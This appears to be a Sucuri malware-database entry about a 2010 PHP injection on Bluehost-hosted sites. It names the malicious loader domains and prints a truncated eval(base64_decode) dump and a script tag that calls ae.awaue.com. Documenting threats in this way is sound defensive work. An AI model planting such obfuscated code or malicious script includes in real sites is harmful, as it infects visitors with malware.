Sucuri Malware Labs

Malware entry: MW:BLUEH:1Home | Notes | Malware data | Signatures | Tools | About

Description:

Code used to insert a malicious javascript on sites hosted at Bluehost. The second wave of attacks affected a few more hosting companies. Loads malware from:

http://domainameat.cc
http://ae.awaue.com

Details:

http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploites-by-domainameat-cc.html

Clean up:

Run the following script: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Malware dump (base 64 added to the .php files):

< ?php /**/ eval (base64_decode ("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFN ..

< s cript src = " http://ae.awaue.com/7"

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb